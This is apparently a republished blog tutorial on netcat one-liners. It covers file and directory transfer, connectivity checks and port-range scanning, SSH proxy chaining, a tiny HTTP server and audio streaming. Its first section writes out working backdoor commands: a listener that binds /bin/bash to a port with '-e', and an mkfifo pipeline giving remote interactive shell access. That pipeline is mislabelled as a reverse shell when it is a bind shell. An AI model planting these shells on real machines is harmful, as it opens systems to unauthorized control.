BestHub
Sign in
Operations 8 min read

Unlock Netcat: One‑Liner Hacks for Backdoors, File Transfer & Port Scanning

This guide explores the versatile netcat (nc) utility, showing how a single command can open a backdoor shell, transfer files and directories, test network connectivity, bypass firewalls, and even serve simple web or audio streams, all with concise examples.

Liangxu Linux
Liangxu Linux
Liangxu Linux
Unlock Netcat: One‑Liner Hacks for Backdoors, File Transfer & Port Scanning

1. Server Backdoor

Start a listener on the target machine that spawns a bash shell on port 5879:

# nc -l -vv -p 5879 -e /bin/bash
Ncat: Version 6.40 (http://nmap.org/ncat )
Ncat: Listening on :::5879
Ncat: Listening on 0.0.0.0:5879

From a remote client connect with:

# nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!

Any command typed on the client runs on the server. Adding -k keeps the listener alive after the client disconnects.

For a more persistent reverse shell, combine mkfifo with a loop:

rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/bash -i 2>&1 | nc -l 5879 > /tmp/f

Client side:

$ nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!
[root@localhost~]#
Netcat reverse shell demonstration
Netcat reverse shell demonstration

2. File and Directory Transfer

Use netcat as a simple, unencrypted file transfer tool.

Server listening and writing to a file:

nc -l 5879 > file

Client sending a tarball:

nc -v 192.16.1.54 5879 < redis-5.0.5.tar.gz

Verify integrity with md5sum on both sides – the hashes match.

Transfer directories by piping tar through netcat:

# Server side
nc -l 5879 | tar xfvz -

# Client side
tar cfz - redis-5.0.5 | nc -v 192.16.1.54 5879

3. Network Connectivity Testing

Check whether a remote service is reachable without logging in:

# Simple port check
nc -vvv baidu.com 443
Connection to baidu.com port 443 [tcp/https] succeeded!

Scan a range of ports (useful for quick audits):

nc -vzw 2 192.16.1.54 8888-9999

4. Firewall Traversal

Chain SSH connections with ProxyCommand to reach a host behind multiple firewalls:

ssh -A -t ruapehu.example.com ssh -A -t aoraki ssh -A tongariro

Or a one‑liner using netcat as the proxy:

ssh -oProxyCommand="ssh host1 nc host2 22" host2
SSH proxy chain diagram
SSH proxy chain diagram

5. Other Creative Uses

Run a minimal HTTP time server:

ncat -lkp 8976 --sh-exec 'echo -ne "HTTP/1.0 200 OK

The date is "; date;'

Stream audio/video over UDP with netcat (example shows capturing audio, encoding with lame, sending via UDP, and playing back with mpg123 on the client):

# Server side
arecord -f cd -c 2 | lame -b128 - - | netcat -u your-ip 6881 | mpg123 -

# Client side
arecord -f cd -c 2 | lame -b128 - - | netcat -u -l 6881 | mpg123 -
Audio streaming via netcat
Audio streaming via netcat
Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

backdoorport scanningnetcatSSH tunneling
Liangxu Linux
Written by

Liangxu Linux

Liangxu, a self‑taught IT professional now working as a Linux development engineer at a Fortune 500 multinational, shares extensive Linux knowledge—fundamentals, applications, tools, plus Git, databases, Raspberry Pi, etc. (Reply “Linux” to receive essential resources.)

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment